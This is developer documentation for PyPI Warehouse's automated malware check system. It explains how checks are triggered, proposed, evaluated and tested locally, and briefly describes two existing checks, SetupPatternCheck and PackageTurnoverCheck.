Malware Checks#

Overview#

This is a high-level diagram of the automated malware check system.

VerdictLifecycle

Checks can be triggered in the following ways:

  • A PyPI user uploads a new File, Release or Project;

  • A schedule;

  • A PyPI administrator initiates an evaluation run.

All of the above triggers call the IMalwareCheckService factory to determine how to execute the check. On production, the DatabaseMalwareCheckService is returned, which runs the check and produces one or more verdicts. PyPI administrator and moderators continuously review verdicts in the Warehouse admin, make determinations about the accuracy of checks, and take further action if needed (e.g. to remove a malicious package surfaced by a verdict).

Contributing#

Check Lifecycle#

CheckLifecycle

Ideas for new malware checks should first be shared by opening an issue. This will initiate a discussion with PyPI administrators and among the broader Python community about the impact of the proposed check. After soliciting feedback, open a pull request to main containing the code for the new check, unit tests, and accompanying documentation. Once the code is reviewed and merged, it will automatically be deployed to production. PyPI administrators can begin evaluating the malware check by moving it into the evaluation state in the check admin and triggering an evaluation run.

The evaluation run generates verdicts, which are viewable in the verdicts admin. After reviewing the verdicts, the administrator will make a determination and communicate it to the check developer in the initial issue. Here are the possible outcomes:

  • The check provides a low-quality or noisy signal (e.g. many false positives), and should be removed. At this point, the check will be moved into a wiped_out state, removing all verdicts generated by the evaluation run, and the code for the check will be removed in the next release.

  • The check provides a useful signal, but requires modifications. The administrator will request changes in the initial issue.

  • The check provides a useful signal, and the administrator enables it.

Adding New Checks#

All active checks are defined as classes in the warehouse/malware/checks/ directory, and exported from __init__.py. The checks in tests/common/checks/ can serve as templates for developing new checks. Simply copy/paste the desired check template into warehouse/malware/checks/ and edit the dunder init file to get started. Complex checks that consist of more than a signle file should be housed in a subdirectory of warehouse/malware/checks/.

All malware check classes should inherit from warehouse.malware.checks.base.MalwareCheckBase, define a scan method, and set the following fields as class attributes:

  • version - 1 for new checks, incrementing by one with every subsequent change

  • short_description - a terse description of the check’s purpose

  • long_description - a more detailed rationale for the check

  • check_type - either "event_hook" or "scheduled"

For each check type, there is an additional required attribute:

  • hooked_object- only for event_hook checks. The name of the object whose creation triggers a check run. Currently "File", "Release", and "Project" are supported.

  • schedule - only for scheduled checks. This should be represented as a dictionary that is passed to a celery crontab.

The prepare classmethod in MalwareCheckBase is called as part of every check execution, and contains the logic for building **kwargs that are passed to the check-defined scan method. prepare can be modified to supply additional keyword arguments for complex checks. Currently, it populates the following kwargs for "event_hook" checks: * obj_id: the id of the hooked_object * file_url: the file url when the hooked_object is a File

All verdicts must be associated with a particular object. For "event_hook" checks, the obj_id should be propogated to verdicts generated by that check. The MalwareVerdict model contains more information about required and optional verdict fields.

Modifying Existing Checks#

Every time that the code for an existing check is modified, the developer should increment the check version number. This is to ensure that each verdict is associated with a particular version of a check.

Workflow and Testing#

There are a few steps for executing new malware checks in a development environment:

  1. Complete the Getting Started instructions to setup a Warehouse development environment

  2. Open dev/environment and set the MALWARE_CHECK_BACKEND variable

    MALWARE_CHECK_BACKEND=warehouse.malware.services.DatabaseMalwareCheckService
    

    In the development environment, Warehouse by default will only print the name of the queued check instead of executing it.

  3. Add your new malware check to the database.

    docker compose run web python -m warehouse malware sync-checks
    
  4. Start Warehouse

    make serve
    
  5. Login to Warehouse in the browser as ewdurbin:password and navigate to /admin/checks

  6. Click on the check name and set the check state to evaluation

  7. Run an evaluation

  8. View the results of the evaluation at /admin/verdicts

  9. For hooked checks, it may be useful to run the check against an object (e.g. File, Release, or Project) that triggers a threat verdict. Set the check state to “enabled” in the check admin and upload some malicious content with twine. For example, if you’re running Warehouse locally, upload a malicious file by running the following command from the directory containing your built package.

    twine upload --repository-url http://localhost/legacy/ dist/*
    

Once you’ve manually validated the basic functioning of your check, add tests to the tests directory. See Submitting patches for more information about how to contribute.

Existing Checks#

Currently, there are two enabled checks in Warehouse.

SetupPatternCheck#

SetupPatternCheck is an "event_hook" check that scans the setup.py file of source distributions upon file upload for potentially malicious code that would execute automatically upon package install.

PackageTurnoverCheck#

PackageTurnoverCheck is a "scheduled" check that runs daily to look for suspicious user behavior around package ownership.

Historical Context#

In September 2019, the Python Software Foundation issued a Request for Proposal for a system to automate the detection of malicious uploads. This system was initially rolled out in February 2020 by pull request 7377.